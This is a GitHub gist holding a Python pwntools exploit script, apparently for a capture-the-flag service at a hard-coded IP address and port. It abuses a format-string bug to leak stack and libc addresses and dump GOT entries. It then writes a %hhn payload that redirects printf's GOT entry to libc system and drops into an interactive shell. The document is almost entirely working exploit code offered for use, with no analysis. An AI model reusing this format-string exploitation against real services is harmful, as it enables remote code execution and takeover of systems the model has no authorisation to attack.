Created
December 29, 2016 21:12
-
-
Save vesim987/0c0235c8049374cf71da46de25d4b1a3 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
host = '78.46.224.86' | |
port = 1337 | |
context.os = 'linux' | |
context.arch = 'amd64' | |
p = remote(host, port) | |
def dump_stack(at=None, n=2048): | |
pl = "" | |
if at: | |
for i in range(n // 8): | |
pl += "%{}$p.".format(at + i) | |
else: | |
pl = ".%p" * (n // 8) | |
pl += "END" | |
p.sendline(pl) | |
x = p.readuntil("END")[:-3].strip().strip(".") | |
stack_leak = x.split(".")[1:] | |
stack_leak = map(lambda y: 0 if "nil" in y else int(y, 16), stack_leak) | |
return stack_leak | |
def fmtleaker(addr): | |
log.debug("leaking addr 0x{:x}".format(addr)) | |
vp = None | |
for i in range(3): | |
try: | |
#vp = remote(host, port) | |
pl = "AAAA%8$s.ENDBBBB" | |
pl += p64(addr) | |
if "\n" in pl: | |
log.warning("newline in payload!") | |
return None | |
p.sendline(pl) | |
x = p.recv(1024) | |
if x: | |
f = x.find("AAAA") + 4 | |
l = x.find(".ENDBBBB") | |
res = x[f:l] | |
if res == "": | |
return "\x00" | |
else: | |
return res | |
return None | |
except KeyboardInterrupt: | |
raise | |
except EOFError: | |
log.debug("got EOF for leaking addr 0x{:x}".format(addr)) | |
pass | |
except Exception: | |
log.warning("got exception...", exc_info=sys.exc_info()) | |
finally: | |
if vp: | |
vp.close() | |
return None | |
def print_got(): | |
for off in range(3): | |
leaked = '' | |
while len(leaked) < 8: | |
addr = bin_got_addr + len(leaked) | |
x = fmtleaker(addr+off*8) | |
if x: | |
leaked += x | |
else: | |
leaked += "\xff" | |
#log.info(hexdump(leaked)) | |
print hex(bin_got_addr+off*8) + ": " + hex(u64(leaked[:8])) | |
bin_addr = 0x400000 | |
bin_got_addr = bin_addr + 0x201000 | |
printf_got = bin_got_addr + 0x18 | |
offset___libc_start_main_ret = 0x203f1 | |
offset_system = 0x00000000000456d0 | |
offset_dup2 = 0x00000000000f8380 | |
offset_read = 0x00000000000f7c60 | |
offset_write = 0x00000000000f7cc0 | |
offset_str_bin_sh = 0x189fc0 | |
offset_puts = 0x0000000000070960 | |
libc_index = 37 | |
stack = dump_stack(libc_index, 16) | |
libc_stack = stack[0] | |
libc_address = libc_stack - offset___libc_start_main_ret | |
libc_bin_sh = libc_address + offset_str_bin_sh | |
libc_system = libc_address + offset_system | |
libc_puts = libc_address + offset_puts | |
log.info("libc_address: " + hex(libc_address)) | |
log.info("libc_bin_sh: {}({})".format(hex(libc_bin_sh), fmtleaker(libc_bin_sh))) | |
log.info("libc_system: " + hex(libc_system)) | |
log.info("bin_got_addr: " + hex(bin_got_addr)) | |
log.info("printf_got: " + hex(printf_got)) | |
log.info("got befor:") | |
print_got() | |
buffer_start = 6 | |
class PayloadGenerator: | |
def __init__(self, index=0): | |
self.mem = [] | |
self.index = index | |
def write(self, where, what): | |
for i in xrange(5): | |
self.mem.append((where + i, (int(what) >> (i * 8)) & 0xFF)) | |
def payload_len(self): | |
mem = self.mem | |
payload = '' | |
mem.sort(key=operator.itemgetter(1)) | |
printed = 0 | |
index = 10 #dummy value | |
for addr, value in mem: | |
if value != printed: | |
if value - printed > 8: | |
payload += "%." + str(value - printed) + "x" | |
else: | |
payload += "A" * (value - printed) | |
printed = value | |
payload += "%" + str(index + self.index) + "$hhn" | |
index += 1 | |
payload += "A" * (8 - (len(payload) % 8)) | |
return len(payload) | |
def gen(self): | |
mem = self.mem | |
payload = '' | |
mem.sort(key=operator.itemgetter(1)) | |
printed = 0 | |
index = self.payload_len() / 8 | |
for addr, value in mem: | |
if value != printed: | |
if value - printed > 8: | |
payload += "%." + str(value - printed) + "x" | |
else: | |
payload += "A" * (value - printed) | |
printed = value | |
payload += "%" + str(index + self.index) + "$hhn" | |
index += 1 | |
payload += "A" * (8 - (len(payload) % 8)) | |
for addr, value in mem: | |
payload += p64(addr) | |
return payload | |
gen = PayloadGenerator(buffer_start) | |
gen.write(printf_got, libc_system) | |
payload = gen.gen() | |
print hexdump(payload, width=8) | |
p.sendline(payload) | |
print p.recv(1024) | |
p.interactive() | |
log.info("got after: ") | |
print_got() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment